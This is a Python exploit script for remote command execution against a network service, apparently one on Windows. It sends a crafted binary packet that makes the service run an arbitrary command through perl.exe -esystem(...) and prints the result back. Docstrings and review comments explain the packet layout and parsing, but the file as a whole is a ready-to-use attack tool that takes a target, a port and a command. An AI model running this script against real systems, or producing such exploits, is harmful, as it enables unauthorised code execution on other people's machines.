import socket
import struct
import sys
def usage():
    """Write the command-line synopsis to stderr and exit with status -1."""
    prog = sys.argv[0]
    synopsis = f"Usage: {prog} <target> <port> <command>"
    print(synopsis, file=sys.stderr)
    exit(-1)
def exploit(host, port, command):
    """Connect to host:port, send one crafted request and print the reply.

    The request wraps ``command`` in a ``perl.exe -esystem('...')`` string
    inside a fixed binary frame; whatever the service sends back is read as
    4-byte big-endian length-prefixed records and echoed to stdout.  The
    process is terminated with ``exit(-3)`` if the TCP connect fails.

    Args:
        host: target hostname or IPv4 address (AF_INET only).
        port: TCP port; passed through ``int()`` before connecting.
        command: command text; backslashes are doubled before it is placed
            inside the single-quoted Perl string.

    Returns:
        None.  Response lines go to stdout, status messages to stderr.
    """
    print(f"[*] Connecting to target '{host}:{port}'...", file=sys.stderr)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((host, int(port)))
    except Exception as ex:
        # Any connect failure ends the process here; the socket is not
        # closed explicitly on this path (process exit reclaims it).
        print(f"[!] Socket error: \n\t{ex}", file=sys.stderr)
        exit(-3)
    else:
        print("[*] Connected to the target.", file=sys.stderr)
        # Byte count of the fixed payload that follows the 4-byte length
        # prefix: the b"\x32\x00\x01" ... b"')\x00" pieces below sum to 46.
        OFFSET = 46
        # Escape backslashes so the text survives Perl's single-quoted string.
        command = command.replace("\\", "\\\\")
        # Single-byte length field: chr(...).encode('latin-1') raises
        # UnicodeEncodeError once OFFSET + len(command) exceeds 0xff.
        command_size = chr(OFFSET + len(command)).encode('latin-1')
        # NOTE: in a bytes literal "\x20" consumes exactly two hex digits, so
        # b"\x2028\x00" is space, '2', '8', NUL - not a single \x2028 escape.
        CRAFTED_PKT = b"\x00\x00\x00" + \
            command_size + \
            b"\x32\x00\x01" + \
            b"\x01\x01\x01" + \
            b"\x01\x01\x00" + \
            b"\x01\x00\x01" + \
            b"\x00\x01\x00" + \
            b"\x01\x01\x00" + \
            b"\x2028\x00" + \
            b"\\perl.exe" + \
            b"\x00 -esystem('" + command.encode('latin-1') + b"')\x00"
        print(f"[*] Sending payload '{command}'", file=sys.stderr)
        sock.sendall(CRAFTED_PKT)
        print("[*] Output:", file=sys.stderr)
        # Read length-prefixed records until EOF (empty recv) or until a
        # record contains "*RETVAL*" (compared case-insensitively).
        while True:
            response_size = sock.recv(4)
            if not response_size:
                break
            n = struct.unpack(">I", response_size)[0]
            # NOTE(review): recv(4) / recv(n) on a stream socket may return
            # fewer bytes than requested; a short read here would mis-frame
            # the following record (struct.unpack also raises on < 4 bytes).
            response = sock.recv(n)
            # Discard the first 5 bytes of each record (presumably a record
            # header - not verified here), then trim whitespace, newlines and NULs.
            response = response[5:].strip()
            response = response.replace(b"\n", b"")
            response = response.replace(b"\x00", b"")
            if b"*RETVAL*" in response.upper():
                break
            print(response.decode('latin-1'))
        sock.close()
if __name__ == "__main__":
    # Entry point: <target> <port> <command>; usage() exits on too few args.
    if len(sys.argv) < 4:
        usage()
    host, port, cmd = sys.argv[1:4]
    # Only a purely numeric port string is accepted; anything else exits -2.
    if not port.isdigit():
        print("[!] Error, invalid port value", file=sys.stderr)
        exit(-2)
    port = int(port)
    exploit(host, port, cmd)
    exit(0)